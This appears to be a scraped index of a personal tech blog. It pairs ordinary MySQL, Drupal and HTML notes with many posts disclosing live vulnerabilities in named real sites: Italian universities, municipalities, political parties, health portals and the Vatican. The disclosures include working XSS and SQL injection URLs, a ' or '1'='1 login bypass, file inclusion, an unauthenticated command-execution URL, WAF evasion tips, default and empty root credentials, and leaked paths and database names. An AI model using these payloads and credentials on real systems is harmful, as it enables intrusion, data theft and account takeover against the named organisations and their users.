pro(re)gress

How to fix Thread stack overrun with mysql 5.7 (and other versions) Thread stack overrun with mysql 5.7 on Linux and Windows Run the server with mysqld --thread_stack=256k to configure my.ini/my.cnf (server.cnf) add: thread_stack = 256K Further problems with mysql on windows On 64 bit (windows) probably you will need to give a bigger value I've been forced to use thread_stack = 512K on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL)) Generic errors with mysql_upgrade ERROR 1436 (HY000) at line 1879: Thread stack overrun ERROR 1436 (HY000) at line 1935 Use 'mysqld --thread_stack=#' to specify a bigger stack

Log all your sql queries on mysql server Note: use only on your Test Server and without a lot of workload or connections othewise you are going to fill all your disk space or the IO resources (and even the CPU load to wait for IO writing). Make sure that your logs folder exists and use the same folder of other mysql logs (ex. /var/log/mysql/) Add in your my.ini/my.cnf (or server.cnf) on Windows: general_log_file="C:/yourWindowsMysql/logs/logsql.log" general_log=1 on linux *unix add: general_log_file="/var/log/mysqld-queries.log" general_log=1  restart your mysql or mariadb server

run the following sql command (ex.: from phpmyadmin) TRUNCATE cache_metatag; Another possible approach is to use drush from the command line $ drush cc all On the drupal website there's no answer to the problem but the answer is quite simple.

Old vulnerabilities and other informations. The main website shares the same problems with http://rousseau.movimento5stelle.it. NOTE/Disclaimer: if you are supposing to vote in a safe manner (It's less safe than the cheapest italian service provider with an old version of commoly used scripts, like wordpress or joomla, installed by your "cousin") I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are. The server mostly haven't been updated for years, except for just what they thought was worth updating. Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites. No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your re

Joomla 1.5.15 (Vulnerable) http://www.reggiadicaserta.beniculturali.it Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/ They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/ path: /var/www/reggiadicaserta They also have malwares (search in the source code http://www.freepokermoney.net or similar urls): http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886 Archived page:http://archive.is/3JJsi Wordpress 4.8.3 (with bogus plugin and theme) http://www.reggiadicaserta.beniculturali.it/wp/ the wordpress version is the "new" website and they also "devastated" the, already bad (with malwares), seo optimization by not redirecting urls. I feel very sorry for that. What a mess.

XSS http://www.beneventocultura.it/commento.php?Id=%3Cscript%3Ealert(document.cookie);%3C/script%3E archived xss: http://archive.is/CwZMy

Install Drupal on a server with a 32bit version of PHP. If you want to install drupal on your TEST server even if you have a 32bit version of php you need to edit: core/modules/system/system.install and comment out ( ~line 973):   if (PHP_INT_SIZE <= 4) {     $requirements['limited_date_range'] = [       'title' => t('Limited date range'),       'value' => t('Your PHP installation has a limited date range.'),       'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),       'severity' => REQUIREMENT_WARNING,     ];   } It's highly suggested to update to a recent 64bit ver

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc. - http://www.dieti.unina.it Ubuntu Joomla 2.5.8 Admin can be changed (admin takeover) even if there's the external login for the users. php files  can be uploaded via administrator/components/com_media/helpers/media.php com_gcalendar  is vulnerable and should be upgraded to dpcalendar. --- http://www.digita.unina.it/ wordpress 4.8.1 http://www.digita.unina.it/digita/wp-login.php sds_dj32f lizzi --- http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql] archived error:http://archive.is/Zw3Ua /home/httpd/elettrotecnica/grupponazionale/ --- XSS http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E --- SQL Injection http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7 sample error archived: http://archive

http://mariorossi.it/categoria.cfm?cat=15&findcateg=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Sql Injection in the email confirmation url (there are several other): http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id] ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999 archived: http://archive.is/kwwXf full query sample in output http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999 SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP='' archived:http://archive.is/xDVeh

XSS https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script> SQL Injection https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici archived error:http://archive.is/9bJfo

http://www.informaprezzi.it/catalogo/gotourl.asp?idprod=[sql injection] archived error:http://archive.is/spRdB

Simple Fix: if ( ! defined ( ' ABSPATH ' )) exit ; _________ Urls that can give you errors with local folder paths on Wordpress 4.8.3 and previous versions: /wp-includes/customize/class-wp-customize-background-image-control.php /wp-includes/customize/class-wp-customize-background-image-setting.php /wp-includes/customize/class-wp-customize-background-position-control.php /wp-includes/customize/class-wp-customize-color-control.php /wp-includes/customize/class-wp-customize-cropped-image-control.php /wp-includes/customize/class-wp-customize-custom-css-setting.php /wp-includes/customize/class-wp-customize-filter-setting.php /wp-includes/customize/class-wp-customize-header-image-control.php /wp-includes/customize/class-wp-customize-header-image-setting.php /wp-includes/customize/class-wp-customize-image-control.php /wp-includes/customize/class-wp-customize-media-control.php /wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php /wp-includes/custo

During the linux day 2017 at guardia sanframondi I played with my phone on the local network ... with the browser (and google to get informations on vulnerabilities). -Linuxday wifi- daloRADIUS default password user:administrator password:radius admin/admin ip:192.168.1.249 http://192.168.1.249 Ubiquity device (wifi antenna/ap)  ip:192.168.1.20 Unauthenticated command execution https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]

Joomla com_fabrik vulnerabilities raise the error related to sql injection http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- archived: http://archive.is/1Up6B Upload vulnerability http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 archived:http://archive.is/6XtTl path (leaked from the errors) /web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore Manuale Software PT100SV Release A8C6 Qui il download del manuale Mirror: filefactory.com http://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf share-online.biz http://www.share-online.biz/dl/GRQZM4YOUSV sendmyway.com https://www.sendmyway.com/bgktennfvwqz gigapeta.com http://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it We can start to detect the version manually (automated tools, like joomscan, are giving random values) from http://lesim1.ing.unisannio.it/configuration.php-dist 1.5.x archived:http://archive.is/VB6I3 libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26. components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23. (Tip: I just used files and folder comparison with beyond compare, but you can also use Meld on linux) To get the path we try to raise errors with wrong sql queries. In this case we are abusing of the weblinks component and adding the filter_order even if the site uses SEF urls (who cares). http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order= to get an output like this: No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHER

http://www.sannioeuropa.com Joomla 1.0.12  - the version is enough to understand all the possible problems involved

http://www.orientamento.unisannio.it The website uses phpnuke with some customizations (sometimes it detects that we are trying to abuse of specific bugs) we can find the path from the Deprecated notices in various modules /var/www/html/copus/home/copus/modules/ ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25 register_globals seems to be On and the variables can be replaced by using post/get requests. Supposed version <=PHP-Nuke-6.9 since banners.php exists In banners.php we have switch($op) { ... } sample http://www.orientamento.unisannio.it/banners.php?op=login By using, for example, this url: http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc the sql is executed and we can dump the data instead of the banners File via sql http://www.orientamento.unisannio.it/banners.

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca ex.: http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca archived with sample javascript text: http://archive.is/To5A4

http://www.dietnutrition.it/ /home2/uydietnu/public_html/ With various requests you can get an error like: Fatal error : Maximum execution time of 120 seconds exceeded in  /home2/uydietnu/public_html/tools/smarty/sysplugins/smarty_internal_cacheresource_file.php  on line  196

  http://www.carminevalentino.it/ Path can be seen in the 404 error pages D:\inetpub\webs\carminevalentinoit\ XSS http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1 http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1 and we can place any video in the content Example: http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1 shortened url:  https://goo.gl/sWhg1P archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech is usually sending spam emails. There's a fake unsubscribe script that reports the removal of anything, even if you add a simple xss. http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com ____ The mail server can be exploited with an old remote exploit for postfix on debian linux. (shellshock)

simple xss http://www.qumran2.net/indice.php?parole=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&p=barra_ric

by simply using the theme url http://www.hacksannio.it/wp-content/themes/betheme/ we can raise an error Fatal error : Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in  /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php  on line  10 _______________ Update: after getting the possibility to execute code it's possible to locally escalate root privileges (expl. openrestinpeace) and local DoS. There are several other websites on the server: 9plus.it abgdhs.com academyhoreca.it acquagia.com agropolibooking.it albertogalantini.com alcacomunicazione.it alexandramatveeva.com alkemicaproject.it allianceagainstcancer.org anelli.info angolodeidesideri.it antonelladambrosio.com apicolturavallicupe.com appcreative.it arredostil.it aspveneto.org avvocatovitali.com bbqcombi.com belsiana7central.com beneventocalcio.it bestrav

Simple XSS http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E _____________________________________ Adobe experience manager CMS A proxy is needed to connect since probably they limited the access from a range of IPs -> Sample working proxy: 5.152.158.4:8080 Admin access:  https://w2.vatican.va:4502/admin SSL verification must be disabled (OCSP on firefox). Update: it's possible to access _____________________________________ Other websites http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true _____________________________________  http://www.photovat.com IIS server D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi File Inclusion dodosmail.php is a bogus contact email script. http://www.movimento5stelle.it/parlamento/segnalazioni.html http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file] example : http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi the script can be triggered to show errors and the path Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58     XSS There are various xss and stored xss in the profil

https://iscriviti.radicali.it directly accessing this url we get an error with the paths https://iscriviti.radicali.it/Landing/RegistraDati D:\xampp\htdocs\radicali\landing_iscrizione\index.php They are using windows and xampp that are not the best solution for a production server that should store sensitive data. The php scripts are using the codeigniter framework. The archived error page: http://archive.is/PFw55 Access to phpmyadmin https://iscriviti.radicali.it/phpmyadmin/ user: root password: "" ftp:iscriviti.radicali.it user: root password: "" update: it's not working anymore.

Vulnerable Phocadownload Possibility to add different videos from youtube www.leganord.org/index.php/documenti-politici/68-gianfranco-miglio/8741-quella-rivoluzione-dal-basso?videoid=[youtube video id] They also got a malware (not from me - a lot of porn stuff) Google Cache http://webcache.googleusercontent.com/search?q=cache:r0-Y-VR0oHAJ:www.leganord.org/xIpV58pu_+&cd=11&hl=it&ct=clnk&gl=it Copy of the cached page: http://archive.is/7Vhy9 Note: they fixed the problems.

There is a path disclosure thanks to an error. https://margot.partitodemocratico.it/nl/cancellami.php?e=test&secure=test unsubscribe_v2.php https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=[anything]&question=[anything]&answer=[anything]&e=[anything]&secure=[anything]&mid=[anything] (original sample - https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=2&question=2&answer=si&e=ZWxpb3BvbGlAdGlzY2FsaS5pdA&secure=04912b36dcc08f33892266834a963bf0&mid=1eea ) It's possible to have access to the system. Is it an "honeypot" ... as stated in the path? It's possible but they didn't fix the bugs and it's possible to access to confidential data. /repository/GCloud-WebRoot/margot.partitodemocratico.it/pd_margot_honeypot/

04/09/2017 http://www.pdcampania.it wordpress 4.2.8 It's possible to inject content and reset the admin password and get the email to an external MX server. The website is down for restyling but the wordpress scripts are still available to the public. For example the admin area: www.pdcampania.it/wp-admin

Content Models Metadata : Content that sets up the presentation or behavior of the rest of the content. These elements are found in the  head  of the document. Elements:   <base> ,  <link> ,  <meta> ,  <noscript> ,  <script> ,  <style> ,  <title> Embedded : Content that imports other resources into the document. Elements:   <audio> ,  <video> ,  <canvas> ,  <iframe> ,  <img> , <math>,  <object> ,  <svg> Interactive : Content specifically intended for user interaction. Elements:   <a> ,  <audio> ,  <video> ,  <button> , <details>,  <embed> ,  <iframe> ,  <img> ,  <input> ,  <label> ,  <object> ,  <select> ,  <textarea> Heading : Defines a section header. Elements:   <h1> ,  <h2> ,  <h3> ,  <h4> ,  <h5> ,  <h6> , <hgroup> Phrasing : This model has a number of inline level element

//loading the settings $this->load->model('setting/setting'); $setting = $this->model_setting_setting->getSetting('mymodule'); //saving the settings $this->load->model('setting/setting'); $setting = $this->model_setting_setting->editSetting('mymodule'); NOTE: in the form the input name="" must start with the name of the module. Example: mymodule_limit, mymodule_status, mymodule_othersetting //getting data from the module - usually is loaded by the configured layout         $this->load->model('extension/module'); $setting = $this->model_extension_module->getModuleByCode('mymodule'); //saving data for the module with new id from the POST (saves a new one that can be loaded from the layout)         $this->load->model('extension/module');                if (!isset($this->request->get['module_id'])) { // $this->model_extension_m

www.snaplife.it vulnerable/unpatched 4.8 wordpress, vulnerable/unpatched theme, path disclosure.

wordpress 4.8.1 vulnerable (zero day) twentyfifteen theme xss twentyfifteen path disclosure sample: http://www.cittaspettacolo.it/2017/wp/wp-content/themes/twentyfifteen/ /web/htdocs/www.cittaspettacolo.it/home/2017/wp

Contact Form version 7 Wordpress 4.8 - rest api content injection exploit. Wordpress <=4.8.2 SQL Injection

https://www.aslbenevento1.it/cupweb/ https://service.sanita.padova.it/cittadino/ https://lpweb.asl3.liguria.it/cupweb/ https://cup.ospedalerc.it/cupwebrc/mainLogin.do | error with ldap Ver. 20.11.00_003 28/04/17 a' or '1'='1 in username and password to access as SGPWeb Operatore if we raise an error errore di accesso al Data Base: ORA-01756: quoted string not properly terminated : SELECT password,description,user_code,connectingdate,users.sco_id from   ----2021-11-05---- There is still an XSS in the login (It's not a big issue).

A simple sql injection is needed to login with *any* user example: ' or '1'='1. https://rousseau.movimento5stelle.it/login.php Sql injection where sharing_id is a table in the group by clause. https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli] http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli] "Fixed" - Update 09/08/2017:  Hanno rimosso da BeppeGrillo.it la pagina "Marcia virtuale" e il file PHP che riportava i dati in chiaro ( https://t.co/3FeUPiHQ8E ) pic.twitter.com/8abp2ItTxa — David Puente (@DavidPuente) 9 agosto 2017 I found accidentaly (august 2018) an archived page (I didn't archived it!) that is showing sensitive informations without an SQLi. Probably the page was tampered by someone or the script itself didn't work correctly. https://archive.li/cmKkC - sample for the voting system: voting_votazioni voting_votazioni_vote The main website als

webcluster-ssl2.webpod5-cph3.one.com 036reklam_se 050_fotografie_nl 10000records_co 1126_se 12aug2006_dk 1555_dk 1come_se 1ehulpwinkel_nl 1plus_se 21800643_dk 224food_com 24pharmusa7_com 2554526 2554694 2555169 2ctrl_se 2ctrl_se_db_2ctrlse 2hc_be 2morrowpeople_c 3000gtcc_se 3danatomia_com 3danatomia_com_oppgaver 3danatomia_com_service 3telesales_dk 4dlaserproducti 50off_se 58webtv_com 5bc_dk 5o1st_be 5snickare_se 7colourbridge_n 7light_eu 81mrx_se _mysql_housekeeping a2be_dk a_steel_be aabneatelilrdoe aahlander_se aahus_dk aaparken8_dk aasm_no aaultrasonics_com ab_coaching_dk ab_leg_dk abacrombie_se abc_literature_ abogadosrapidos abytorpsamatort acamarina_com accademiabasket accademiabasket_it_new_wp accademiabasket_it_wp acceler8_be acceptanceandco ackerstedt_se acomodeo_com actierp_se actiwave_se acvn_nl adamas_dk adamguest_com adamseidel_co_u adding_sights_eu addoit_se addquaregnon_be adelina_se adessofuoridaic ad